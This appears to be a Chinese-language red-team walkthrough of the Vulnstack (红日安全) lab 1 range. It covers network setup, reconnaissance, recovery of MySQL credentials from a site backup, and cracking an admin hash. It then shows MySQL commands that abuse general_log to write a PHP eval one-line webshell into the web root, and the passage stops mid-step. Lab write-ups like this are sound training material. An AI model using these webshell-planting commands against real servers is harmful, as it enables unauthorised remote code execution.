红队攻防知识分享-红日安全团队靶场1
环境搭建
靶场链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
环境拓扑图:
以下是虚拟机网络配置
虚拟机 | 网络配置 |
---|---|
Windows7 x64 | VMnet1:192.168.54.128;VMnet2:192.168.52.143 |
Win2k3 Measploitable | VMnet1:192.168.52.141 |
Windows Server 2008 R2 x64 | VMnet1:192.168.52.138 |
kali | VMnet2:192.168.54.129 |
刚开机时,需要在Windows7中开启phpstudy,phpstudy在c盘下
信息收集
通过nmap收集到开启的服务有web服务以及mysql服务
扫描站点
经过整理得到三条信息:
1)beifen.rar 站点备份压缩包
2)http://192.168.54.128/phpmyadmin/index.php mysql登录后台页面
3)http://192.168.54.128/phpinfo.php php信息
1)备份压缩包里面有一个命名为yxcms的目录
从这里我们可以得到站点的架构以及信息
在升级日志中可以得知yxcms版本为1.2.1
在protected中的config文件里得到mysql的账号密码信息
2)访问mysql,输入账号密码,成功登录
获取到mysql版本信息
访问newyxcms库中的yx_admin表得到密码168a73655bfecefdb15b14984dd2ad60,猜测应该是做过md5加密,进行解密
得到密码:949ba59abbe56e05
3)phpinfo中,通过路径得知该服务器是Windows系统
通过查询yxcms版本我们进一步获取信息
后台地址,默认账号密码
查询yxcms1.2.1已知漏洞
漏洞利用
数据库弱密码,获取getshell
数据库默认密码root这个就不说了,获取getshell。
select '<?php eval($_POST[shell])?>' into outfile '路径' //需要知道绝对路径
报错,没有权限。
show variables like '%general%'; //查看全局日志是否开启
set global general_log=on//开启全局日志
set global general_log_file="c://phpstudy/www/1.php"//指定新的日志路径
select '<?php eval($_POST[shell])?>'; //查找一句话木马,会将一句话